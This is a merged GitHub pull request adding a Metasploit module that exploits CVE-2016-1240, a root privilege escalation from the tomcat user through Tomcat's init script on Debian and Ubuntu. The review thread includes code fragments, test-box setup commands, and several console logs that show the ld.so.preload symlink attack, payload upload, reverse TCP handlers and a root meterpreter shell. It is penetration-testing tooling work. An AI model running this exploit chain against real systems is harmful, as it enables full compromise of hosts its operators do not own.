### PR TITLE
tomcat 8 priv esc on ubuntu (cve-2016-1240)

### PR DESCRIPTION
**Pull request by h00die**
Part of #7444 . I waited 6yrs and no one else got to it :)

Tomcat (6, 7, 8) packages provided by default repositories on Debian-based
distributions (including Debian, Ubuntu etc.) provide a vulnerable
tomcat init script that allows local attackers who have already gained access
to the tomcat account (for example, by exploiting an RCE vulnerability
in a java web application hosted on Tomcat, uploading a webshell etc.) to
escalate their privileges from tomcat user to root and fully compromise the
target system.

Tested against Tomcat 8.0.32-1ubuntu1.1 on Ubuntu 16.04

## Verification

- [ ] Start `msfconsole`
- [ ] get an initial shell as the tomcat user
- [ ] `use exploit/linux/local/tomcat_ubuntu_log_init_priv_esc`
- [ ] `set session #`
- [ ] `run`
- [ ] **Verify** you get a root shell

### CODE REVIEW

**Comment by h00die** [comment]
forgot to do a pre-compiled version

File: modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb [hunk 1]
```diff
@@ -0,0 +1,200 @@
...
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_file_for_cleanup(payload_path)
+
+    # delete the log and symlink ld.so.preload
+    vprint_status("Deleting #{catalina}")
+    rm_f(catalina)
+    vprint_status("Creating symlink from #{preload} to #{catalina}")
+    cmd_exec("ln -s #{preload} #{catalina}")
+
+    # we now need tocat to restart
```
Comment (dwelch-r7) [inline modules/exploits/linux/local/tomcat_ubuntu_log_init_priv_esc.rb:165]:
```suggestion
    # we now need tomcat to restart
```

File: documentation/modules/exploit/linux/local/tomcat_ubuntu_log_init_priv_esc.md [hunk 2]
```diff
@@ -0,0 +1,126 @@
...
+to the tomcat account (for example, by exploiting an RCE vulnerability
+in a java web application hosted on Tomcat, uploading a webshell etc.) to
+escalate their privileges from tomcat user to root and fully compromise the
+target system.
+
+Tested against Tomcat 8.0.32-1ubuntu1.1 on Ubuntu 16.04
+
+### Install
+
+This will isntall Tomcat 8 (8.0.32-1ubuntu1.1) on Ubuntu 16.04 using the build from
```
Comment (h00die) [inline documentation/modules/exploit/linux/local/tomcat_ubuntu_log_init_priv_esc.md:15]: *install

File: documentation/modules/exploit/linux/local/tomcat_ubuntu_log_init_priv_esc.md [hunk 3]
```diff
@@ -0,0 +1,126 @@
...
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Get an initial shell as the `tomcat` user (may be version dependent like `tomcat8`)
+4. Do: `use exploit/linux/local/tomcat_ubuntu_log_init_priv_esc`
+5. Do: `set session #`
+6. Do: `run`
+7. You should get a root.
```
Comment (h00die) [inline documentation/modules/exploit/linux/local/tomcat_ubuntu_log_init_priv_esc.md:40]: get a root? wow.

File: documentation/modules/exploit/linux/local/tomcat_ubuntu_log_init_priv_esc.md [hunk 4]
```diff
@@ -0,0 +1,126 @@
...
+
+## Options
+
+### CATALINA
+
+Location of catalina.out file. Defaults to `/var/log/tomcat8/catalina.out`.
```
Comment (h00die) [inline documentation/modules/exploit/linux/local/tomcat_ubuntu_log_init_priv_esc.md:46]: put this in ticks

File: documentation/modules/exploit/linux/local/tomcat_ubuntu_log_init_priv_esc.md [hunk 5]
```diff
@@ -0,0 +1,128 @@
...
+We also change the `tomcat8` user's shell to `/bin/bash` to make setting up the priv-esc
+easier.
+
+```
+sudo apt-get install libecj-java build-essential
+wget https://launchpad.net/~ubuntu-security/+archive/ubuntu/ppa/+build/10427282/+files/tomcat8_8.0.32-1ubuntu1.1_all.deb
+wget https://launchpad.net/~ubuntu-security/+archive/ubuntu/ppa/+build/10427282/+files/libtomcat8-java_8.0.32-1ubuntu1.1_all.deb
+wget https://launchpad.net/~ubuntu-security/+archive/ubuntu/ppa/+build/10427282/+files/tomcat8-common_8.0.32-1ubuntu1.1_all.deb
+sudo dpkg -i *tomcat*.deb
+sudo sed -i 's|/bin/false|/bin/bash|g' /etc/passwd
```
Comment (adfoster-r7) [inline documentation/modules/exploit/linux/local/tomcat_ubuntu_log_init_priv_esc.md:27]: Should this be restricted to just the tomcat8 account?

**Comment by adfoster-r7** [comment]
Are there manual steps required to reboot the tomcat service? The module just hangs for me

```
msf6 exploit(linux/local/tomcat_ubuntu_log_init_priv_esc) > run session=-1

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: cmd
[!]  * incompatible session platform: unix
[-] Handler failed to bind to 192.168.123.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable app version detected: 8.0.32.pre.1ubuntu1.1
[+] Original /var/log/tomcat8/catalina.out backed up to /Users/adfoster/.msf4/loot/20230201185948_default_192.168.123.132_varlogtomcat8_341990.txt
[*] Writing '/tmp/.zahv39lQyQ' (250 bytes) ...
[+] Waiting 1800 seconds on tomcat to re-open the logs aka a Tomcat service restart

```

I pulled down a fresh 2016 box and followed your install steps.

File: documentation/modules/exploit/linux/local/tomcat_ubuntu_log_init_priv_esc.md (hunk 5 above)
Comment (h00die) [reply documentation/modules/exploit/linux/local/tomcat_ubuntu_log_init_priv_esc.md:27]: yes, but this also assumes you made a box for testing this exploit specifically, so there are no real implications with being too broad.

**Comment by h00die** [comment]
So a few things happened here, it looks like `file?` doesn't detect a symlink file.  To clean the environment please do:
```
rm /var/log/tomcat8/catalina.out
touch /var/log/tomcat8/catalina.out
chown tomcat8:root /var/log/tomcat8/catalina.out
```

I'm also finding that I didn't unlink the symlink that was created during the exploitation phase, so adding that in now.

**Comment by h00die** [comment]
I've retested the cleanup, i'm not sure why your original session died, but I ran this about 10 times tonight getting the `cleanup` just right and didn't experience that at all.

**Comment by adfoster-r7** [comment]
Looks like the cleanup works better now - thanks!

It looks like my previous statement was wrong - the original session is fine, but the new session dies after manually calling `service tomcat8 restart`

```
msf6 exploit(linux/local/tomcat_ubuntu_log_init_priv_esc) > run session=1 verbose=true

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: cmd
[!]  * incompatible session platform: unix
[-] Handler failed to bind to 192.168.123.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable app version detected: 8.0.32.pre.1ubuntu1.1
[*] Creating backup of /var/log/tomcat8/catalina.out
[+] Original /var/log/tomcat8/catalina.out backed up to /Users/adfoster/.msf4/loot/20230202112555_default_192.168.123.132_varlogtomcat8_598951.txt
[+] gcc is installed
[*] Compiling exploit stub: /tmp/.xRN49t.so
[*] Max line length is 65537
[*] Writing 352 bytes in 1 chunks of 1280 bytes (octal-encoded), using printf
[*] Uploading Payload to /tmp/.6RqElmt
[*] Writing '/tmp/.6RqElmt' (250 bytes) ...
[*] Max line length is 65537
[*] Writing 250 bytes in 1 chunks of 735 bytes (octal-encoded), using printf
[*] Deleting /var/log/tomcat8/catalina.out
[*] Creating symlink from /etc/ld.so.preload to /var/log/tomcat8/catalina.out
[+] Waiting 1800 seconds on tomcat to re-open the logs aka a Tomcat service restart ie `service tomcat8 restart`
[*] Sleeping for 2 seconds before attempting again
[*] Sleeping for 4 seconds before attempting again
[*] Sleeping for 8 seconds before attempting again
[*] Sleeping for 16 seconds before attempting again
[*] injecting /tmp/.xRN49t.so into /etc/ld.so.preload
[*] Escalating payload privileges via SUID binary (sudo)
[*] Executing payload
[*] 192.168.123.132 - Command shell session 2 closed.
```

Which is the same result for the live compile being set:

```
msf6 exploit(linux/local/tomcat_ubuntu_log_init_priv_esc) > run session=-1 verbose=true compile=True 

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: cmd
[!]  * incompatible session platform: unix
[-] Handler failed to bind to 192.168.123.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable app version detected: 8.0.32.pre.1ubuntu1.1
[*] Creating backup of /var/log/tomcat8/catalina.out
[+] Original /var/log/tomcat8/catalina.out backed up to /Users/adfoster/.msf4/loot/20230202113154_default_192.168.123.132_varlogtomcat8_801473.txt
[+] gcc is installed
[*] Compiling exploit stub: /tmp/.UhYGZg.so
[*] Max line length is 65537
[*] Writing 350 bytes in 1 chunks of 1274 bytes (octal-encoded), using printf
[*] Uploading Payload to /tmp/.DfofAM
[*] Writing '/tmp/.DfofAM' (250 bytes) ...
[*] Max line length is 65537
[*] Writing 250 bytes in 1 chunks of 735 bytes (octal-encoded), using printf
[*] Deleting /var/log/tomcat8/catalina.out
[*] Creating symlink from /etc/ld.so.preload to /var/log/tomcat8/catalina.out
[+] Waiting 1800 seconds on tomcat to re-open the logs aka a Tomcat service restart ie `service tomcat8 restart`
[*] Sleeping for 2 seconds before attempting again
[*] Sleeping for 4 seconds before attempting again
[*] Sleeping for 8 seconds before attempting again
[*] injecting /tmp/.UhYGZg.so into /etc/ld.so.preload
[*] Escalating payload privileges via SUID binary (sudo)
[*] Executing payload
[*] 192.168.123.132 - Command shell session 4 closed.
```

**Comment by adfoster-r7** [comment]
In the previous run my original shell was with `payload/cmd/unix/reverse_bash` which didn't successfully open up a root shell

Trying with meterpreter instead of the original bash shell gets further without a crash, but hangs on the prompt being interactive

```
msf6 exploit(linux/local/tomcat_ubuntu_log_init_priv_esc) > run session=-1 verbose=true

[-] Handler failed to bind to 192.168.123.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable app version detected: 8.0.32.pre.1ubuntu1.1
[*] Creating backup of /var/log/tomcat8/catalina.out
[+] Original /var/log/tomcat8/catalina.out backed up to /Users/adfoster/.msf4/loot/20230202114147_default_192.168.123.132_varlogtomcat8_258715.txt
[+] gcc is installed
[*] Compiling exploit stub: /tmp/.dNObtfe.so
[*] Uploading Payload to /tmp/.0mNUnSN9za
[*] Writing '/tmp/.0mNUnSN9za' (250 bytes) ...
[*] Deleting /var/log/tomcat8/catalina.out
[*] Creating symlink from /etc/ld.so.preload to /var/log/tomcat8/catalina.out
[+] Waiting 1800 seconds on tomcat to re-open the logs aka a Tomcat service restart ie `service tomcat8 restart`
[*] Sleeping for 2 seconds before attempting again
[*] Sleeping for 4 seconds before attempting again
[*] Sleeping for 8 seconds before attempting again
[*] injecting /tmp/.dNObtfe.so into /etc/ld.so.preload
[*] Escalating payload privileges via SUID binary (sudo)
[*] Executing payload
[*] Sending stage (3045348 bytes) to 192.168.123.132
[*] Meterpreter session 3 opened (192.168.123.1:4444 -> 192.168.123.132:57942) at 2023-02-02 11:42:04 +0000
```

Until I eventually hit ctrl+c to kill the module:

```
^C
[-] Failed to delete /tmp/.0mNUnSN9za: stdapi_fs_delete_file: Operation failed: 1
[*] Exploit completed, but no session was created.
```

Which does leave me an active session at least, but doesn't feel quite right - I assume that it's hanging on the file cleanup at the end of the module

```
msf6 exploit(linux/local/tomcat_ubuntu_log_init_priv_esc) > sessions -i -1 -C getuid
[*] Running 'getuid' on meterpreter session 3 (192.168.123.132)
Server username: root
```

**Comment by h00die** [comment]
as per talks with @adfoster-r7 there was some strange stuff going on here.  I suspect it was because of `/etc/ld.so.preload` being corrupted.  However, this latest push now works (both shells responsive, no crash, no errors thrown to screen) with the following base payloads:

- SSH_login
- payload/cmd/unix/reverse_bash
- linux/x86/meterpreter/reverse_tcp
- payload/python/meterpreter/reverse_tcp

File: documentation/modules/exploit/linux/local/tomcat_ubuntu_log_init_priv_esc.md (hunk 5 above)
Comment (adfoster-r7) [reply documentation/modules/exploit/linux/local/tomcat_ubuntu_log_init_priv_esc.md:27]: Not a blocker; I think we can remove this line if we just update the `su` line below to specify the shell to use explicitly

```
sudo su --shell /bin/bash tomcat8
```

**Review by adfoster-r7 — COMMENTED** [review]
This works now, thanks! 🎉 

```
msf6 exploit(linux/local/tomcat_ubuntu_log_init_priv_esc) > run session=-1 verbose=true

[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture: cmd
[!]  * incompatible session platform: unix
[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable app version detected: 8.0.32.pre.1ubuntu1.1
[*] Creating backup of /var/log/tomcat8/catalina.out
[+] Original /var/log/tomcat8/catalina.out backed up to /Users/adfoster/.msf4/loot/20230206134536_default_192.168.123.142_varlogtomcat8_436807.txt
[+] gcc is installed
[*] Compiling exploit stub: /tmp/.JDcaiB8.so
[*] Max line length is 65537
[*] Writing 358 bytes in 1 chunks of 1298 bytes (octal-encoded), using printf
[*] Uploading Payload to /tmp/.9jajin82f8
[*] Writing '/tmp/.9jajin82f8' (282 bytes) ...
[*] Max line length is 65537
[*] Writing 282 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
[*] Deleting /var/log/tomcat8/catalina.out
[*] Creating symlink from /etc/ld.so.preload to /var/log/tomcat8/catalina.out
[+] Waiting 1800 seconds on tomcat to re-open the logs aka a Tomcat service restart

(manually called `sudo systemctl restart tomcat8.service` here)

[*] Sleeping for 2 seconds before attempting again
[*] Sleeping for 4 seconds before attempting again
[*] injecting /tmp/.JDcaiB8.so into /etc/ld.so.preload
[*] Escalating payload privileges via SUID binary (sudo)
[*] Executing payload
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045348 bytes) to 192.168.123.142
[+] Deleted /tmp/.JDcaiB8.so
[+] Deleted /tmp/.9jajin82f8
[!] Tried to delete /var/log/tomcat8/catalina.out, unknown result
[*] Meterpreter session 2 opened (192.168.123.1:4444 -> 192.168.123.142:38380) at 2023-02-06 13:45:44 +0000
[*] Max line length is 65537
[*] Writing 5828 bytes in 1 chunks of 21614 bytes (octal-encoded), using printf

meterpreter > 
```

**Comment by adfoster-r7** [comment]
## Release Notes

Adds a new `exploit/linux/local/tomcat_ubuntu_log_init_priv_esc` module for CVE-2016-1240 targetting Tomcat (6, 7, 8). By default repositories on Debian-based distributions (including Debian, Ubuntu etc.) provide a vulnerable tomcat init script that allows local attackers who have already gained access to the tomcat account (for example, by exploiting an RCE vulnerability in a java web application hosted on Tomcat, uploading a webshell etc.) to escalate their privileges from tomcat user to root and fully compromise the target system.

**Pull request merged**